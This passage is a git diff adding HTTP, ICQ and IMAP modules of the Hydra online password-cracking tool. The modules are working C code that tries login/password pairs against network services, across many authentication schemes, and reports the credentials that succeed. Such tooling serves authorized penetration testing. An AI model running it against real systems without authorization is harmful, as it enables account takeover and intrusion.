hydra_report_found_host(port, ip, "www", fp); + hydra_completed_pair_found(); + if (buf != NULL) { + free(buf); + buf = NULL; + } + } else { + if (ptr != NULL && *ptr != '4') + fprintf(stderr, "[WARNING] Unusual return code: %c for %s:%s\n", (char) *(index(buf, ' ') + 1), login, pass); + + //the first authentication type failed, check the type from server header + if ((hydra_strcasestr(buf, "WWW-Authenticate: Basic") == NULL) && (http_auth_mechanism == AUTH_BASIC)) { + //seems the auth supported is not Basic shceme so testing further + int find_auth = 0; + + if (hydra_strcasestr(buf, "WWW-Authenticate: NTLM") != NULL) { + http_auth_mechanism = AUTH_NTLM; + find_auth = 1; + } +#ifdef LIBOPENSSL + if (hydra_strcasestr(buf, "WWW-Authenticate: Digest") != NULL) { + http_auth_mechanism = AUTH_DIGESTMD5; + find_auth = 1; + } +#endif + + if (find_auth) { +// free(buf); +// buf = NULL; + return 1; + } + } + hydra_completed_pair(); + } +// free(buf); +// buf = NULL; + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; +} + +void service_http(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port, char *type) { + int run = 1, next_run = 1, sock = -1; + int myport = PORT_HTTP, mysslport = PORT_HTTP_SSL; + char *ptr, *ptr2; + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + + if ((webtarget = strstr(miscptr, "://")) != NULL) { + webtarget += strlen("://"); + if ((ptr2 = index(webtarget, ':')) != NULL) { /* step over port if present */ + *ptr2 = 0; + ptr2++; + ptr = ptr2; + if (*ptr == '/' || (ptr = index(ptr2, '/')) != NULL) + miscptr = ptr; + else + miscptr = slash; /* to make things easier to user */ + } else if ((ptr2 = index(webtarget, '/')) != NULL) { + miscptr = malloc(strlen(ptr2) + 1); + freemischttp = 1; + strcpy(miscptr, ptr2); + *ptr2 = 0; + } else + webtarget = NULL; + } + if (cmdlinetarget != NULL && webtarget == NULL) + webtarget = cmdlinetarget; + else if (webtarget == NULL && cmdlinetarget == NULL) + webtarget = hydra_address2string(ip); + if (port != 0) + webport = port; + else if ((options & OPTION_SSL) == 0) + webport = myport; + else + webport = mysslport; + + while (1) { + next_run = 0; + switch (run) { + case 1: /* connect and service init function */ + { + if (sock >= 0) + sock = hydra_disconnect(sock); + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + } else { + if (port != 0) + mysslport = port; + sock = hydra_connect_ssl(ip, mysslport); + port = mysslport; + } + if (sock < 0) { + if (freemischttp) + free(miscptr); + fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + next_run = 2; + break; + } + case 2: /* run the cracking function */ + next_run = start_http(sock, ip, port, options, miscptr, fp, type); + break; + case 3: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + if (freemischttp) + free(miscptr); + hydra_child_exit(0); + return; + default: + if (freemischttp) + free(miscptr); + fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(0); + } + run = next_run; + } +} + +void service_http_get(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + service_http(ip, sp, options, miscptr, fp, port, "GET"); +} + +void service_http_head(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + service_http(ip, sp, options, miscptr, fp, port, "HEAD"); +} + +int service_http_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-icq.c b/hydra-icq.c new file mode 100644 index 0000000..c42e6e2 --- /dev/null +++ b/hydra-icq.c @@ -0,0 +1,256 @@ +#include "hydra-mod.h" + +extern char *HYDRA_EXIT; +extern int child_head_no; +int seq = 1; + +const unsigned char icq5_table[] = { + 0x59, 0x60, 0x37, 0x6B, 0x65, 0x62, 0x46, 0x48, 0x53, 0x61, 0x4C, + 0x59, 0x60, 0x57, 0x5B, 0x3D, 0x5E, 0x34, 0x6D, 0x36, 0x50, 0x3F, + 0x6F, 0x67, 0x53, 0x61, 0x4C, 0x59, 0x40, 0x47, 0x63, 0x39, 0x50, + 0x5F, 0x5F, 0x3F, 0x6F, 0x47, 0x43, 0x69, 0x48, 0x33, 0x31, 0x64, + 0x35, 0x5A, 0x4A, 0x42, 0x56, 0x40, 0x67, 0x53, 0x41, 0x07, 0x6C, + 0x49, 0x58, 0x3B, 0x4D, 0x46, 0x68, 0x43, 0x69, 0x48, 0x33, 0x31, + 0x44, 0x65, 0x62, 0x46, 0x48, 0x53, 0x41, 0x07, 0x6C, 0x69, 0x48, + 0x33, 0x51, 0x54, 0x5D, 0x4E, 0x6C, 0x49, 0x38, 0x4B, 0x55, 0x4A, + 0x62, 0x46, 0x48, 0x33, 0x51, 0x34, 0x6D, 0x36, 0x50, 0x5F, 0x5F, + 0x5F, 0x3F, 0x6F, 0x47, 0x63, 0x59, 0x40, 0x67, 0x33, 0x31, 0x64, + 0x35, 0x5A, 0x6A, 0x52, 0x6E, 0x3C, 0x51, 0x34, 0x6D, 0x36, 0x50, + 0x5F, 0x5F, 0x3F, 0x4F, 0x37, 0x4B, 0x35, 0x5A, 0x4A, 0x62, 0x66, + 0x58, 0x3B, 0x4D, 0x66, 0x58, 0x5B, 0x5D, 0x4E, 0x6C, 0x49, 0x58, + 0x3B, 0x4D, 0x66, 0x58, 0x3B, 0x4D, 0x46, 0x48, 0x53, 0x61, 0x4C, + 0x59, 0x40, 0x67, 0x33, 0x31, 0x64, 0x55, 0x6A, 0x32, 0x3E, 0x44, + 0x45, 0x52, 0x6E, 0x3C, 0x31, 0x64, 0x55, 0x6A, 0x52, 0x4E, 0x6C, + 0x69, 0x48, 0x53, 0x61, 0x4C, 0x39, 0x30, 0x6F, 0x47, 0x63, 0x59, + 0x60, 0x57, 0x5B, 0x3D, 0x3E, 0x64, 0x35, 0x3A, 0x3A, 0x5A, 0x6A, + 0x52, 0x4E, 0x6C, 0x69, 0x48, 0x53, 0x61, 0x6C, 0x49, 0x58, 0x3B, + 0x4D, 0x46, 0x68, 0x63, 0x39, 0x50, 0x5F, 0x5F, 0x3F, 0x6F, 0x67, + 0x53, 0x41, 0x25, 0x41, 0x3C, 0x51, 0x54, 0x3D, 0x5E, 0x54, 0x5D, + 0x4E, 0x4C, 0x39, 0x50, 0x5F, 0x5F, 0x5F, 0x3F, 0x6F, 0x47, 0x43, + 0x69, 0x48, 0x33, 0x51, 0x54, 0x5D, 0x6E, 0x3C, 0x31, 0x64, 0x35, + 0x5A, 0x00, 0x00 +}; + +void fix_packet(char *buf, int len) { + unsigned long c1, c2; + unsigned long r1, r2; + int pos, key, k; + + c1 = buf[8]; + c1 <<= 8; + c1 |= buf[4]; + c1 <<= 8; + c1 |= buf[2]; + c1 <<= 8; + c1 |= buf[6]; + + r1 = (rand() % (len - 0x18)) + 0x18; + r2 = rand() & 0xff; + + c2 = r1; + c2 <<= 8; + c2 |= buf[r1]; + c2 <<= 8; + c2 |= r2; + c2 <<= 8; + c2 |= icq5_table[r2]; + c2 ^= 0xff00ff; + + c1 ^= c2; + buf[0x14] = c1 & 0xff; + buf[0x15] = (c1 >> 8) & 0xff; + buf[0x16] = (c1 >> 16) & 0xff; + buf[0x17] = (c1 >> 24) & 0xff; + + key = len * 0x68656c6cL; + key += c1; + pos = 0xa; + + for (; pos < len; pos += 4) + k = key + icq5_table[pos & 0xff]; +} + +void icq_header(char *buf, unsigned short cmd, unsigned long uin) { + buf[0] = 0x02; + buf[1] = 0x00; + buf[2] = cmd & 0xff; + buf[3] = (cmd >> 8) & 0xff; + buf[4] = seq & 0xff; + buf[5] = (seq++ >> 8) & 0xff; + buf[6] = uin & 0xff; + buf[7] = (uin >> 8) & 0xff; + buf[8] = (uin >> 16) & 0xff; + buf[9] = (uin >> 24) & 0xff; +} + +int icq_login(int s, char *login, char *pass) { + unsigned long uin = strtoul(login, NULL, 10); + char buf[256]; + int len; + + bzero(buf, sizeof(buf)); + + icq_header(buf, 0x03e8, uin); + len = strlen(pass) + 1; + buf[14] = len; + memcpy(&buf[16], pass, len); + buf[16 + len] = 0x78; + buf[24 + len] = 0x04; + buf[29 + len] = 0x02; + buf[39 + len] = 0x08; + buf[41 + len] = 0x78; + + return (hydra_send(s, buf, 43 + len, 0)); +} + +int icq_login_1(int s, char *login) { + unsigned long uin = strtoul(login, NULL, 10); + char buf[64]; + + icq_header(buf, 0x044c, uin); + return (hydra_send(s, buf, 10, 0)); +} + +int icq_disconnect(int s, char *login) { + unsigned long uin = strtoul(login, NULL, 10); + char buf[64]; + + bzero(buf, sizeof(buf)); + icq_header(buf, 0x0438, uin); + buf[10] = 20; + memcpy(&buf[12], "B_USER_DISCONNECTED", 20); + buf[32] = 0x5; + return (hydra_send(s, buf, 34, 0)); +} + +int icq_ack(int s, char *login) { + unsigned long uin = strtoul(login, NULL, 10); + char buf[64]; + + buf[0] = 0x02; + buf[1] = 0x00; + buf[2] = 0x0a; + buf[3] = 0x0; + buf[4] = seq & 0xff; + buf[5] = (seq >> 8) & 0xff; + buf[6] = uin & 0xff; + buf[7] = (uin >> 8) & 0xff; + buf[8] = (uin >> 16) & 0xff; + buf[9] = (uin >> 24) & 0xff; + + return (hydra_send(s, buf, 10, 0)); +} + +int start_icq(int sock, char *ip, int port, FILE * output, char *miscptr, FILE * fp) { + unsigned char buf[1024]; + char *login, *pass; + char *empty = ""; + int i, r; + + if (strlen(login = hydra_get_next_login()) == 0) + return 2; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + for (i = 0; login[i]; i++) + if (!isdigit((int) login[i])) { + fprintf(stderr, "[ERROR] Invalid UIN %s\n, ignoring.", login); + hydra_completed_pair(); + return 2; + } + + icq_login(sock, login, pass); + + while (1) { + if ((r = hydra_recv(sock, (char *) buf, sizeof(buf))) == 0) { + return 1; + } + + if (r < 0) { + if (verbose) + fprintf(stderr, "[ERROR] Process %d: Can not connect [unreachable]\n", (int) getpid()); + return 3; + } + + if (buf[2] == 0x5a && buf[3] == 0x00) { + hydra_report_found_host(port, ip, "icq", output); + hydra_completed_pair_found(); + icq_ack(sock, login); + icq_login_1(sock, login); + hydra_recv(sock, (char *) buf, sizeof(buf)); + icq_ack(sock, login); + hydra_recv(sock, (char *) buf, sizeof(buf)); + icq_ack(sock, login); + icq_disconnect(sock, login); + break; + } else if ((buf[2] != 10 && buf[2] != 250) || buf[3] != 0) { + hydra_completed_pair(); + break; + } + +/* if((buf[2] != 10 || buf[3] != 0) && (buf[2] != 250 || buf[3] != 0)) */ + } + + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; +} + +void service_icq(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1; + int myport = PORT_ICQ; + + if (port) + myport = port; + + port = myport; + + if ((options & OPTION_SSL) != 0 && child_head_no == 0) { + fprintf(stderr, "[ERROR] You can not use SSL with ICQ!\n"); + hydra_child_exit(0); + } + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + + while (1) { + switch (run) { + case 1: + if (sock >= 0) + sock = hydra_disconnect(sock); + sock = hydra_connect_udp(ip, myport); + if (sock < 0) { + fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + next_run = 2; + break; + case 2: + next_run = start_icq(sock, ip, port, fp, miscptr, fp); + break; + case 3: + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(2); + default: + fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(2); + } + run = next_run; + } +} + +int service_icq_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-imap.c b/hydra-imap.c new file mode 100644 index 0000000..3f73bee --- /dev/null +++ b/hydra-imap.c @@ -0,0 +1,576 @@ +#include "hydra-mod.h" +#include "sasl.h" + +extern char *HYDRA_EXIT; +char *buf; +int counter; + +int imap_auth_mechanism = AUTH_CLEAR; + +char *imap_read_server_capacity(int sock) { + char *ptr = NULL; + int resp = 0; + char *buf = NULL; + + do { + if (buf != NULL) + free(buf); + ptr = buf = hydra_receive_line(sock); + if (buf != NULL) { + if (strstr(buf, "CAPABILITY") != NULL && buf[0] == '*') { + resp = 1; + usleep(300000); + /* we got the capability info then get the completed warning info from server */ + while (hydra_data_ready(sock)) { + free(buf); + buf = hydra_receive_line(sock); + } + } else { + if (buf[strlen(buf) - 1] == '\n') + buf[strlen(buf) - 1] = 0; + if (buf[strlen(buf) - 1] == '\r') + buf[strlen(buf) - 1] = 0; + if (isdigit((int) *ptr) && *(ptr + 1) == ' ') { + resp = 1; + } + } + } + } while (buf != NULL && resp == 0); + return buf; +} + +int start_imap(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = ""; + char *login, *pass, buffer[500], buffer2[500]; + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + while (hydra_data_ready(s)) { + if ((buf = hydra_receive_line(s)) == NULL) + return (1); + free(buf); + } + + switch (imap_auth_mechanism) { + case AUTH_LOGIN: + sprintf(buffer, "%d AUTHENTICATE LOGIN\r\n", counter); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + if ((buf = hydra_receive_line(s)) == NULL) + return 1; + if (strstr(buf, " NO ") != NULL || strstr(buf, "failed") != NULL || strstr(buf, " BAD ") != NULL) { + hydra_report(stderr, "[ERROR] IMAP LOGIN AUTH : %s\n", buf); + free(buf); + return 3; + } + free(buf); + strcpy(buffer2, login); + hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2)); + + sprintf(buffer, "%.250s\r\n", buffer2); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + if ((buf = hydra_receive_line(s)) == NULL) + return 1; + if (strstr(buf, " NO ") != NULL || strstr(buf, "failed") != NULL || strstr(buf, " BAD ") != NULL) { + hydra_report(stderr, "[ERROR] IMAP LOGIN AUTH : %s\n", buf); + free(buf); + return 3; + } + free(buf); + strcpy(buffer2, pass); + hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2)); + sprintf(buffer, "%.250s\r\n", buffer2); + break; + + case AUTH_PLAIN: + sprintf(buffer, "%d AUTHENTICATE PLAIN\r\n", counter); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + if ((buf = hydra_receive_line(s)) == NULL) + return 1; + if (strstr(buf, " NO ") != NULL || strstr(buf, "failed") != NULL || strstr(buf, " BAD ") != NULL) { + hydra_report(stderr, "[ERROR] IMAP PLAIN AUTH : %s\n", buf); + free(buf); + return 3; + } + free(buf); + + memset(buffer, 0, sizeof(buffer)); + sasl_plain(buffer, login, pass); + sprintf(buffer, "%.250s\r\n", buffer); + break; + +#ifdef LIBOPENSSL + case AUTH_CRAMMD5: + case AUTH_CRAMSHA1: + case AUTH_CRAMSHA256:{ + int rc = 0; + char *preplogin; + + rc = sasl_saslprep(login, SASL_ALLOW_UNASSIGNED, &preplogin); + if (rc) { + return 3; + } + + switch (imap_auth_mechanism) { + + case AUTH_CRAMMD5: + sprintf(buffer, "%d AUTHENTICATE CRAM-MD5\r\n", counter); + break; + case AUTH_CRAMSHA1: + sprintf(buffer, "%d AUTHENTICATE CRAM-SHA1\r\n", counter); + break; + case AUTH_CRAMSHA256: + sprintf(buffer, "%d AUTHENTICATE CRAM-SHA256\r\n", counter); + break; + } + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + //get the one-time BASE64 encoded challenge + if ((buf = hydra_receive_line(s)) == NULL) + return 1; + if (strstr(buf, " NO ") != NULL || strstr(buf, "failed") != NULL || strstr(buf, " BAD ") != NULL || strstr(buf, "BYE") != NULL) { + switch (imap_auth_mechanism) { + case AUTH_CRAMMD5: + hydra_report(stderr, "[ERROR] IMAP CRAM-MD5 AUTH : %s\n", buf); + break; + case AUTH_CRAMSHA1: + hydra_report(stderr, "[ERROR] IMAP CRAM-SHA1 AUTH : %s\n", buf); + break; + case AUTH_CRAMSHA256: + hydra_report(stderr, "[ERROR] IMAP CRAM-SHA256 AUTH : %s\n", buf); + break; + } + free(buf); + return 3; + } + + memset(buffer, 0, sizeof(buffer)); + from64tobits((char *) buffer, buf + 2); + free(buf); + + memset(buffer2, 0, sizeof(buffer2)); + + switch (imap_auth_mechanism) { + case AUTH_CRAMMD5:{ + sasl_cram_md5(buffer2, pass, buffer); + sprintf(buffer, "%s %.250s", preplogin, buffer2); + } + break; + case AUTH_CRAMSHA1:{ + sasl_cram_sha1(buffer2, pass, buffer); + sprintf(buffer, "%s %.250s", preplogin, buffer2); + } + break; + case AUTH_CRAMSHA256:{ + sasl_cram_sha256(buffer2, pass, buffer); + sprintf(buffer, "%s %.250s", preplogin, buffer2); + } + break; + } + hydra_tobase64((unsigned char *) buffer, strlen(buffer), sizeof(buffer)); + sprintf(buffer, "%.250s\r\n", buffer); + free(preplogin); + } + break; + case AUTH_DIGESTMD5:{ + sprintf(buffer, "%d AUTHENTICATE DIGEST-MD5\r\n", counter); + + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) + return 1; + //receive + if ((buf = hydra_receive_line(s)) == NULL) + return 1; + if (strstr(buf, " NO ") != NULL || strstr(buf, "failed") != NULL || strstr(buf, " BAD ") != NULL || strstr(buf, "BYE") != NULL) { + hydra_report(stderr, "[ERROR] IMAP DIGEST-MD5 AUTH : %s\n", buf); + free(buf); + return 3; + } + memset(buffer, 0, sizeof(buffer)); + from64tobits((char *) buffer, buf); + free(buf); + + if (verbose) + hydra_report(stderr, "DEBUG S: %s\n", buffer); + + sasl_digest_md5(buffer2, login, pass, buffer, miscptr, "imap", NULL, 0, NULL); + if (buffer2 == NULL) + return 3; + if (verbose) + hydra_report(stderr, "DEBUG C: %s\n", buffer2); + hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2)); + sprintf(buffer, "%s\r\n", buffer2); + + } + break; + case AUTH_SCRAMSHA1:{ + char clientfirstmessagebare[200]; + char serverfirstmessage[200]; + char *preplogin; + int rc = sasl_saslprep(login, SASL_ALLOW_UNASSIGNED, &preplogin); + + if (rc) { + return 3; + } + sprintf(buffer, "%d AUTHENTICATE SCRAM-SHA-1\r\n", counter); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + if ((buf = hydra_receive_line(s)) == NULL) + return 1; + if (strstr(buf, " NO ") != NULL || strstr(buf, "failed") != NULL || strstr(buf, " BAD ") != NULL || strstr(buf, "BYE") != NULL) { + hydra_report(stderr, "[ERROR] IMAP SCRAM-SHA1 AUTH : %s\n", buf); + free(buf); + return 3; + } + free(buf); + + snprintf(clientfirstmessagebare, sizeof(clientfirstmessagebare), "n=%s,r=hydra", preplogin); + free(preplogin); + memset(buffer2, 0, sizeof(buffer2)); + sprintf(buffer2, "n,,%.200s", clientfirstmessagebare); + hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2)); + snprintf(buffer, sizeof(buffer), "%s\r\n", buffer2); + + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + buf = hydra_receive_line(s); + if (buf == NULL) + return 1; + if (strstr(buf, " NO ") != NULL || strstr(buf, "failed") != NULL || strstr(buf, " BAD ") != NULL || strstr(buf, "BYE") != NULL) { + if (verbose || debug) + hydra_report(stderr, "[ERROR] Not a valid server challenge\n"); + free(buf); + return 1; + } else { + /* recover server challenge */ + memset(buffer, 0, sizeof(buffer)); + //+ cj1oeWRyYU9VNVZqcHQ5RjNqcmVXRVFWTCxzPWhGbTNnRGw0akdidzJVVHosaT00MDk2 + from64tobits((char *) buffer, buf + 2); + free(buf); + strncpy(serverfirstmessage, buffer, sizeof(serverfirstmessage) - 1); + serverfirstmessage[sizeof(serverfirstmessage) - 1] = '\0'; + + memset(buffer2, 0, sizeof(buffer2)); + sasl_scram_sha1(buffer2, pass, clientfirstmessagebare, serverfirstmessage); + if (buffer2 == NULL) { + hydra_report(stderr, "[ERROR] Can't compute client response\n"); + return 1; + } + hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2)); + sprintf(buffer, "%s\r\n", buffer2); + } + } + break; +#endif + case AUTH_NTLM:{ + unsigned char buf1[4096]; + unsigned char buf2[4096]; + + //Send auth request + sprintf(buffer, "%d AUTHENTICATE NTLM\r\n", counter); + + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) + return 1; + //receive + if ((buf = hydra_receive_line(s)) == NULL) + return 1; + if (strstr(buf, " NO ") != NULL || strstr(buf, "failed") != NULL || strstr(buf, " BAD ") != NULL || strstr(buf, "BYE") != NULL) { + hydra_report(stderr, "[ERROR] IMAP NTLM AUTH : %s\n", buf); + free(buf); + return 3; + } + free(buf); + //send auth and receive challenge + //send auth request: lst the server send it's own hostname and domainname + buildAuthRequest((tSmbNtlmAuthRequest *) buf2, 0, NULL, NULL); + to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthRequest *) buf2)); + + sprintf(buffer, "%s\r\n", buf1); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) + return 1; + if ((buf = hydra_receive_line(s)) == NULL) + return (1); + + //recover challenge + from64tobits((char *) buf1, buf + 2); + free(buf); + + //Send response + buildAuthResponse((tSmbNtlmAuthChallenge *) buf1, (tSmbNtlmAuthResponse *) buf2, 0, login, pass, NULL, NULL); + to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthResponse *) buf2)); + + sprintf(buffer, "%s\r\n", buf1); + } + break; + default: + //clear authentication + sprintf(buffer, "%d LOGIN \"%.100s\" \"%.100s\"\r\n", counter, login, pass); + } + + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + if ((buf = hydra_receive_line(s)) == NULL) + return (1); + + if (strstr(buf, " NO ") != NULL || strstr(buf, "failed") != NULL || strstr(buf, " BAD ") != NULL || strstr(buf, "BYE") != NULL) { + if (verbose) + hydra_report(stderr, "[ERROR] %s\n", buf); + free(buf); + hydra_completed_pair(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + if (counter == 4) + return 1; + return (2); + } + free(buf); + + hydra_report_found_host(port, ip, "imap", fp); + hydra_completed_pair_found(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; +} + +void service_imap(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1; + int myport = PORT_IMAP, mysslport = PORT_IMAP_SSL, disable_tls = 1; + char *buffer1 = "1 CAPABILITY\r\n"; + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + while (1) { + switch (run) { + case 1: /* connect and service init function */ + if (sock >= 0) + sock = hydra_disconnect(sock); +// usleep(275000); + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + } else { + if (port != 0) + mysslport = port; + sock = hydra_connect_ssl(ip, mysslport); + port = mysslport; + } + if (sock < 0) { + if (verbose || debug) + hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + buf = hydra_receive_line(sock); + + if ((buf == NULL) || (strstr(buf, "OK") == NULL && buf[0] != '*')) { /* check the first line */ + if (verbose || debug) + hydra_report(stderr, "[ERROR] Not an IMAP protocol or service shutdown:\n"); + if (buf != NULL) + free(buf); + hydra_child_exit(2); + } + free(buf); + /* send capability request */ + if (hydra_send(sock, buffer1, strlen(buffer1), 0) < 0) + exit(-1); + counter = 2; + buf = imap_read_server_capacity(sock); + + if (buf == NULL) { + hydra_child_exit(2); + } + + if ((miscptr != NULL) && (strlen(miscptr) > 0)) { + int i; + + for (i = 0; i < strlen(miscptr); i++) + miscptr[i] = (char) toupper((int) miscptr[i]); + + if (strstr(miscptr, "TLS") || strstr(miscptr, "SSL")) { + disable_tls = 0; + } + } +#ifdef LIBOPENSSL + if (!disable_tls) { + /* check for STARTTLS, if available we may have access to more basic auth methods */ + if (strstr(buf, "STARTTLS") != NULL) { + hydra_send(sock, "2 STARTTLS\r\n", strlen("2 STARTTLS\r\n"), 0); + counter++; + free(buf); + buf = hydra_receive_line(sock); + if (buf == NULL || (strstr(buf, " NO ") != NULL || strstr(buf, "failed") != NULL || strstr(buf, " BAD ") != NULL)) { + hydra_report(stderr, "[ERROR] TLS negotiation failed, no answer received from STARTTLS request\n"); + } else { + free(buf); + if ((hydra_connect_to_ssl(sock) == -1)) { + if (verbose) + hydra_report(stderr, "[ERROR] Can't use TLS\n"); + disable_tls = 1; + run = 1; + break; + } else { + if (verbose) + hydra_report(stderr, "[VERBOSE] TLS connection done\n"); + } + /* ask again capability request but in TLS mode */ + if (hydra_send(sock, "3 CAPABILITY\r\n", strlen("3 CAPABILITY\r\n"), 0) < 0) + hydra_child_exit(2); + buf = imap_read_server_capacity(sock); + counter++; + if (buf == NULL) + hydra_child_exit(2); + } + } else + hydra_report(stderr, "[ERROR] option to use TLS/SSL failed as it is not supported by the server\n"); + } +#endif + + if (verbose) + hydra_report(stderr, "[VERBOSE] CAPABILITY: %s", buf); + + //authentication should be listed AUTH= like in the extract below + //STARTTLS LOGINDISABLED AUTH=GSSAPI AUTH=DIGEST-MD5 AUTH=CRAM-MD5 + if ((strstr(buf, "=LOGIN") == NULL) && (strstr(buf, "=NTLM") != NULL)) { + imap_auth_mechanism = AUTH_NTLM; + } +#ifdef LIBOPENSSL + if ((strstr(buf, "=LOGIN") == NULL) && (strstr(buf, "=SCRAM-SHA-1") != NULL)) { + imap_auth_mechanism = AUTH_SCRAMSHA1; + } + + if ((strstr(buf, "=LOGIN") == NULL) && (strstr(buf, "=DIGEST-MD5") != NULL)) { + imap_auth_mechanism = AUTH_DIGESTMD5; + } + + if ((strstr(buf, "=LOGIN") == NULL) && (strstr(buf, "=CRAM-SHA256") != NULL)) { + imap_auth_mechanism = AUTH_CRAMSHA256; + } + + if ((strstr(buf, "=LOGIN") == NULL) && (strstr(buf, "=CRAM-SHA1") != NULL)) { + imap_auth_mechanism = AUTH_CRAMSHA1; + } + + if ((strstr(buf, "=LOGIN") == NULL) && (strstr(buf, "=CRAM-MD5") != NULL)) { + imap_auth_mechanism = AUTH_CRAMMD5; + } +#endif + if ((strstr(buf, "=LOGIN") == NULL) && (strstr(buf, "=PLAIN") != NULL)) { + imap_auth_mechanism = AUTH_PLAIN; + } + + if (strstr(buf, "=LOGIN") != NULL) { + imap_auth_mechanism = AUTH_LOGIN; + } + free(buf); + + if ((miscptr != NULL) && (strlen(miscptr) > 0)) { + + if (strstr(miscptr, "CLEAR")) + imap_auth_mechanism = AUTH_CLEAR; + + if (strstr(miscptr, "LOGIN")) + imap_auth_mechanism = AUTH_LOGIN; + + if (strstr(miscptr, "PLAIN")) + imap_auth_mechanism = AUTH_PLAIN; + +#ifdef LIBOPENSSL + if (strstr(miscptr, "CRAM-MD5")) + imap_auth_mechanism = AUTH_CRAMMD5; + + if (strstr(miscptr, "CRAM-SHA1")) + imap_auth_mechanism = AUTH_CRAMSHA1; + + if (strstr(miscptr, "CRAM-SHA256")) + imap_auth_mechanism = AUTH_CRAMSHA256; + + if (strstr(miscptr, "DIGEST-MD5")) + imap_auth_mechanism = AUTH_DIGESTMD5; + + if (strstr(miscptr, "SCRAM-SHA1")) + imap_auth_mechanism = AUTH_SCRAMSHA1; + +#endif + if (strstr(miscptr, "NTLM")) + imap_auth_mechanism = AUTH_NTLM; + } + + if (verbose) { + switch (imap_auth_mechanism) { + case AUTH_CLEAR: + hydra_report(stderr, "[VERBOSE] using IMAP CLEAR LOGIN mechanism\n"); + break; + case AUTH_LOGIN: + hydra_report(stderr, "[VERBOSE] using IMAP LOGIN AUTH mechanism\n"); + break; + case AUTH_PLAIN: + hydra_report(stderr, "[VERBOSE] using IMAP PLAIN AUTH mechanism\n"); + break; +#ifdef LIBOPENSSL + case AUTH_CRAMMD5: + hydra_report(stderr, "[VERBOSE] using IMAP CRAM-MD5 AUTH mechanism\n"); + break; + case AUTH_CRAMSHA1: + hydra_report(stderr, "[VERBOSE] using IMAP CRAM-SHA1 AUTH mechanism\n"); + break; + case AUTH_CRAMSHA256: + hydra_report(stderr, "[VERBOSE] using IMAP CRAM-SHA256 AUTH mechanism\n"); + break; + case AUTH_DIGESTMD5: + hydra_report(stderr, "[VERBOSE] using IMAP DIGEST-MD5 AUTH mechanism\n"); + break; + case AUTH_SCRAMSHA1: + hydra_report(stderr, "[VERBOSE] using IMAP SCRAM-SHA1 AUTH mechanism\n"); + break; +#endif + case AUTH_NTLM: + hydra_report(stderr, "[VERBOSE] using IMAP NTLM AUTH mechanism\n"); + break; + } + } + + next_run = 2; + break; + case 2: /* run the cracking function */ + next_run = start_imap(sock, ip, port, options, miscptr, fp); + counter++; + break; + case 3: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(0); + return; + 